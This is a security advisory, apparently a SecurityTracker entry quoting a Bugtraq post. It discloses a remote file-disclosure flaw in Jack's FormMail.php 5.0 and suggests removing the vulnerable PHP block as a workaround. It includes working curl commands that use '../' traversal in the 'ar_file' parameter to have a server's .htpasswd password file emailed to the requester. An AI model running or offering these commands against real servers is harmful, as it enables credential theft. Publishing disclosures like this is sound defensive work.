Jack's FormMail.php 'ar_file' Parameter Lets Remote Users Obtain Files from the System
|
|
SecurityTracker Alert ID: 1012747
|
|
SecurityTracker URL: http://securitytracker.com/id?1012747
|
|
CVE Reference: GENERIC-MAP-NOMATCH
(Links to External Site)
|
Date: Jan 1 2005
|
Impact: Disclosure of system information, Disclosure of user information
|
Exploit Included: Yes
|
Version(s): 5.0; possibly other versions
|
Description: A vulnerability was reported in Jack's FormMail.php. A remote user can view files on the target system.
Hack Hawk reported that a remote user can specify a value for the 'ar_file' auto-reply parameter to cause the target server to send
an arbitrary file to the remote user.
A demonstration exploit is provided:
# curl -e http://yoursite.com/ -d ar_file=../members/.htpasswd
-d
email=you@yoursite.com http://yoursite.com/cgi-bin/formmail.php
|
Impact: A remote user can obtain files on the target system that are readable by the target web service.
|
Solution: No solution was available at the time of this entry.
The report indicates that, as a workaround, you can remove the following
code from the FormMail.php script:
------------------------------------------------------
if (file_exists($ar_file)) {
$fd
= fopen($ar_file, "rb");
$ar_message = fread($fd, filesize($ar_file));
fclose($fd);
mail_it($ar_message, ($ar_subject)?stripslashes($ar_subject):"RE:
Form
Submission", ($ar_from)?$ar_from:$recipient, $email);
}
------------------------------------------------------
|
Vendor URL: dtheatre.com/scripts/formmail.php (Links to External Site)
|
Cause: Access control error, Input validation error
|
Underlying OS: Linux (Any), UNIX (Any), Windows (Any)
|
Reported By: Hack Hawk <hh@hackhawk.net>
|
Message History:
None.
|
Source Message Contents
|
Date: 31 Dec 2004 15:06:38 -0800
From: Hack Hawk <hh@hackhawk.net>
Subject: Jacks FormMail.php remote file access vulnerability
|
Security Advisory
Vendor: Jack (Jack's Scripts)
Date: 31-Dec-2004
Script: FormMail.php
Site: http://dtheatre.com/scripts/formmail.php
Type: Remote
Severity: High
Version: 5.0 (maybe others)
Script Overview:
Jacks FormMail.php script is a simple PHP script that
allows web site owners to easily email form values to
themselves without much work or scripting knowledge.
Problem:
The script currently accepts an auto-reply variable
(ar_file) that specifies a filepath to send to the
person submitting the form. The problem is that
this variable can be defined by the person submitting
the form and can be used to have arbitrary server
files sent to that person.
I found this vulnerability because someone used the
attack against a customer of mine. Because this is
being used in the wild, I'm posting immediately to
BUGTRAQ without waiting for Jack to fix the script.
Solution:
Remove the following code from the FormMail.php
script.
------------------------------------------------------
if (file_exists($ar_file)) {
$fd = fopen($ar_file, "rb");
$ar_message = fread($fd, filesize($ar_file));
fclose($fd);
mail_it($ar_message, ($ar_subject)?stripslashes($ar_subject):"RE:
Form Submission", ($ar_from)?$ar_from:$recipient, $email);
------------------------------------------------------
Example Attack:
Assume the following
Script Location : http://yoursite.com/cgi-bin/formmail.php
Password File Location : http://yoursite.com/members/.htpasswd
Use the following curl command to have the password file emailed to you.
# curl -e http://yoursite.com/ -d ar_file=../members/.htpasswd -d
email=you@yoursite.com http://yoursite.com/cgi-bin/formmail.php
Depending on permission settings, the .htpasswd could be
compromised, even if it is outside of the html folder as
in the following example.
# curl -e http://yoursite.com/ -d ar_file=../../.htpasswd -d
email=you@yoursite.com http://yoursite.com/cgi-bin/formmail.php
|
|
